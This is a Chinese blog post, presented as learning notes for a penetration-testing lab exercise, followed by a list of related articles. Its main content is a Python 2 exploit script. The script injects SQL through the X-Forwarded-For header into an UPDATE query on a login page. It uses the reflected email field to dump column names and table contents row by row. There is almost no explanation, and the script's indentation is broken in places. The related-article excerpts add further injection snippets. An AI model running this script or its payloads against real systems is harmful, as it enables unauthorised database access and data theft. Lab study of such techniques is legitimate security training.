渗透测试之Update型注入学习笔记

最新推荐文章于 2024-08-05 12:31:15 发布
最新推荐文章于 2024-08-05 12:31:15 发布
阅读量1.5k 收藏
点赞数
分类专栏: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dajitui2024/article/details/79396413
版权

参考实验:http://www.hetianlab.com/expc.do?ce=572fa9e9-7eb1-4928-bfe3-eaa444eab1e0

sqlupdateattack.py

   #!/usr/bin/python

    # -*- coding: utf-8 -*-

    import HTMLParser 

    import urlparse 

    import urllib 

    import urllib2 

    import cookielib 

    import string 

    import binascii

    import re

    import time

    #截取字符串中startStr,endStr中间的值

    def GetMiddleStr(content,startStr,endStr):

        patternStr = r'%s(.+?)%s'%(startStr,endStr)

        p = re.compile(patternStr,re.S)

        m= re.search(p,content)

        if m:

            return m.group(1)

    #跑表数量

    def count(table_name,mode):

        if mode==0:

            tn16=binascii.b2a_hex(table_name.encode("utf8"))

            sql_count='1.1.1.1\',email=(select count(COLUMN_NAME) from information_schema.columns where table_name=0x'+tn16+' and table_schema=database()) where username=\'admin\'#'

        else:

            if table_name=='testuser':

                sql_count='1.1.1.1\',email=(select count(*) from ( select * from testuser) as x) where username=\'admin\'#'

            else:

                sql_count='1.1.1.1\',email=(select count(*) from '+table_name+') where username=\'admin\'#'

        return sql_count

    #跑表的列名用到的sql注入语句

    def sql_column(table_name,num):

        tn16=binascii.b2a_hex(table_name.encode("utf8")) 

        sql_column='1.1.1.1\',email=(select COLUMN_NAME from information_schema.columns where table_name=0x'+tn16+' limit '+str(num)+',1 ) where username=\'admin\'#'

        return sql_column

    #跑表的内容

    def sql_data(table_name,column,num):

        sql_data='1.1.1.1\',email=(select '+column+' from '+table_name+' order by id  limit '+str(num)+',1) where username=\'admin\'#'   

        return sql_data

    #跑表的内容(与update所用表(即演示中的testuser表)冲突使用)

    def sql_users(column,num):

        sql_users='1.1.1.1\',email=(select '+column+' from ( select * from testuser) as x order by ID limit '+str(num)+',1) where username=\'admin\'#'

        return sql_users

    #注入,先模拟登陆后截取结果并写入文件   

    def inject(posturl,sql):

        try:

            cookieJar=cookielib.CookieJar()

            opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookieJar))

            headers =  {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04', 

                        'X-Forwarded-For' : sql} 

            postData = {'uname' : 'admin', 

                        'passwd' : 'admin', 

                        'submit' : 'Submit' } 

            postData = urllib.urlencode(postData) 

            request = urllib2.Request(posturl, postData, headers) 

            result = opener.open(request)

            str=result.read()

            m=GetMiddleStr(str,'your email is:','</font><br>')

            return m

        except Exception,err:

            err = 'weberror'

            raise Exception(err)

    if __name__ == '__main__': 

        posturl = 'http://127.0.0.1/test/index.php'

    table_name=['testuser', 'test1']

    #先跑表的各字段名,并存放到临时的column_name中   

        column_name=[]

        for table in table_name:

            sql_count=inject(posturl,count(table,0))

           print table+":\r\n"

           for num in range(int(sql_count)):

                sql=sql_column(table,num)

                try:

                    m=inject(posturl,sql)

                    column_name.append(m)

                except TypeError:

                    print 'error'  

            print column_name

    #跑对应的数据   

            for column in column_name:

                print table+"|||"+column+":"

                for num in range(int(inject(posturl,count(table,1)))):

                    if table=='testuser':

                        sql=sql_users(column,num)

                    else:

                        sql=sql_data(table,column,num)

                    m=inject(posturl,sql)

                    print m

            print "\n"
怀揣梦想的大鸡腿
关注
专栏目录
update语句_WEB安全之SQL注入(13)——update注入
weixin_39848953的博客
12-09 2629
01前言大家好,我是阿里斯,一名IT行业小白。上一篇文章分享了insert注入,算是一个铺垫,今天我们一起来看看update注入update注入是非常危险一种注入。可能因为payload构造不合理会直接导致整张表都被修改。02update注入update正常语句update users set sex='man' where id=$id;update注入是非常危险的,不管你开发还是安...
SQL注入Update注入
weixin_43765321的博客
03-03 5863
1. MySQL中的update函数 如果我们需要修改或更新MysQL中的数据,我们可以使用SQLUPDATE命令来操作。首先更新某一行中的一个列。 UPDATE table SET column=mew_value WHERE column= value 为lastname 是"Wilson”的人添加firstname : UPDATE Person SET FirstName = 'Fred WHERE LastName = ‘Wilson’ 更新某一行中的若干列 UPDATE table SET c
SQL报错注入updatexml
最新发布
2301_78549931的博客
08-05 1010
第一个参数:XML的内容第二个参数:是需要update的位置XPATH路径第三个参数:是更新后的内容所以第一和第三个参数可以随便写,只需要利用第二个参数,他会校验你输入的内容是否符合XPATH格式,当我们输入一个不符合xpath语法的语句就报错了,我们注入利用的就是这一点。
POST Update 注入
LoveStarbucks的博客
01-03 706
POST Update 注入 1.Mysql update介绍 2.过滤内容介绍 function check_input($value) { if(!empty($value)) { // truncation (see comments) $value = substr($value,0,20);//获得下标从0到20的字符串 } // Stripslashes if...
insert/update注入
Ethan024的博客
03-30 1020
insert/update注入 实验环境: 皮卡丘靶场—insert/update注入 原理: insert注入(注册新用户): 后端没有做防SQL注入处理,在前端注册的信息,通过insert直接拼接到数据库中; insert into member(username, pw, sex, phonenum, email, address) value (‘xiaohong’, 1111, 1, 2, 3, 4) insert语句一般通过or进行闭合: insert into member(userna
SQL注入——update注入(pikachu)
W小哥
01-15 3288
第一步:访问目标站点,注册一个账号xiaosan:123456,并登录 第二步:点击修改个人信息,并用burpsuite工具拦截数据包,修改住址为123456 拦截数据包,右键发送到Repeater 第三步:测试注入点 正常请求页面 输入单引号测试注入点页面 第四步:经过测试发现不能使用联合查询注入,故改为报错注入获取当前网站所连接的数据库的名字 1’ or updatexml(1,co...
渗透测试实战指南笔记
weixin_67830340的博客
04-07 1980
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程序中会有5个选项,如下
Web安全攻防渗透测试实战指南笔记
Ren59421的博客
04-05 8023
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程...
WEB渗透学习笔记4——堆叠注入和二次注入
林林木林林L的博客
07-24 2252
堆叠查询注入攻击 Stackedinjections:堆叠注入。从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在mysql中,主要是命令行中,每一条语句结尾加 ; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做 stacked injection 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql 语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而 unioninjection(
【安全牛学习笔记】Kali Linux渗透测试方法
edu_aqniu的博客
11-09 2391
1.安全问题的根源 ①由于分层思想,导致每个层次的相关人员都只关心自己层次的工作,因此每个人认识系统都是片面的,而安全是全方位的,整体的,所以造成安全问题。 ②技术人员追求效率,导致只追求功能实现,而很容易忽略安全性的工作 ③由于人都是会犯错误的,因此最大的安全威胁是人,所以无法避免安全隐患,但可以降低安全风险 软件安全生命周期: 需求——>设计——>编码——>测试—
web安全攻防渗透测试实训笔记
m0_65385236的博客
04-07 1385
1. Nmap的基本 Nmap + ip 6+ ip Nmap -A 开启操作系统识别和版本识别功能 – T(0-6档) 设置扫描的速度 一般设置T4 过快容易被发现 -v 显示信息的级别,-vv显示更详细的信息 192.168.1.1/24 扫描C段 192.168.11 -254 =上 nmap -A -T4 -v -iL ~/targets.txt (iL表示要扫描的目标位于一个文档中) --------------- 192.168.1.1/24 ...
MYSQL updatexml()函数报错注入解析
09-09
主要介绍了MYSQL updatexml()函数报错注入解析,并且简单介绍了updatexml函数,具有一定参考价值,需要的朋友可以了解下。
记一次渗透测试中thinkphp3.2.3 update注入
isxiaole的博客
04-29 789
. 背景介绍 在一次做渗透时,首先从领导那拿到客户需要做测试的后台URL。果然,一如既往的登录页面,但发现没有验证码验证策略,那咱先就抓个包试试登录爆破呗(爆破用Cluster bomb选项,此处不再阐述)。拿到后台口令–admin/admin123 857-857丶我估计以我的运气手动也能测出来,但客户为啥不提前给我呢~~ 摸索过程 使用Google的附件Wappalyzer查到用户使用的是thinkphp3框架。thinkphp是国内著名的php开发框架,有完善的开发文档,基于MVC架构,..
SQL注入实战:Update注入
ting_liang的博客
01-21 1005
有的程序员在写源代码的时候,只是对查询的sql语句的用户输入内容进行了过滤,忽略了updateupdate表名称set列名称=新值where更新条件;1、sqli-labs less-17关。类sql语句的用户输入的内容的过滤。二、mysql的Update语句复习。如下图所示,爆出数据库名称。一:Update注入原理。如下图所示,爆出版本信息。
针对UPDATE语句的SQL注入
qq_69100706的博客
07-30 255
在CTF(Capture The Flag)竞赛中,针对UPDATE语句的SQL注入是一种利用Web应用程序逻辑漏洞的技术,当应用程序使用用户提供的数据来更新数据库中的记录时尤为常见。如果应用程序没有正确地清理或参数化这些用户输入,攻击者就可以注入恶意SQL代码,以操纵数据库更新操作。
[less17][sqli靶场] 对update语句的注入
qq_37301470的博客
11-13 304
与以往的登录界面不同 这是个修改密码的php页面 在对uname进行了各种闭合之后发现一直返回同一结果,延时也没用 无能为力只能看看源码 源码如下 <?php //including the Mysql connect parameters. include("../sql-connections/sql-connect.php"); error_reporting(0); function check_input($value) { if(!empty($value)) { // tr
25-4 SQL注入攻击 - update注入
weixin_43263566的博客
03-09 804
使用mysql函数:代码中使用了过时的mysql函数来执行SQL查询,而不是使用更安全的mysqli或PDO。mysql函数对于SQL注入攻击是脆弱的,因为它没有提供预处理语句的功能。黑名单过滤只能防止已知的攻击字符串,而无法应对所有可能的变种和绕过方法。替换为适合您情况的实际条件,以确保只有符合条件的行会被更新。获取用户输入的ID值,但没有对其进行充分的验证和过滤,直接将其用于SQL查询。自定义的黑名单过滤机制:代码中使用了自定义的黑名单函数。用户输入未经过充分验证和过滤:在代码中,通过。
【安全】P 2-12 POST Update语句注入
Z_David_Z的博客
02-14 245
目录0X01 MySQL update介绍0X02 过滤介绍0X03 MySQL update注入0X04 sqlmap安全测试 MySQL update介绍 过滤介绍 MySQL update注入 sqlmap安全测试 0X01 MySQL update介绍 update 语句可用来修改表中的数据, 简单来说基本的使用形式为: update 表名称 set 列名称=新值 where 更新条件; UPDATE table_name SET field1=new-value1, field2=new-valu
update注入的一个小trick
vspiders的博客
06-18 343
0x01 Mysql特性Mysql中update语句的定义如下:UPDATE table_name SET field1 = new-value1, field2 = new-value2 [WHERE Clause]但是偶然发现,field1与field2两字段可以同名,并且UPDATE之后的字段内容会以field2的赋值为准。如上图中,Link字段被赋值了两次,最终的该Link字段的内容以最后...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值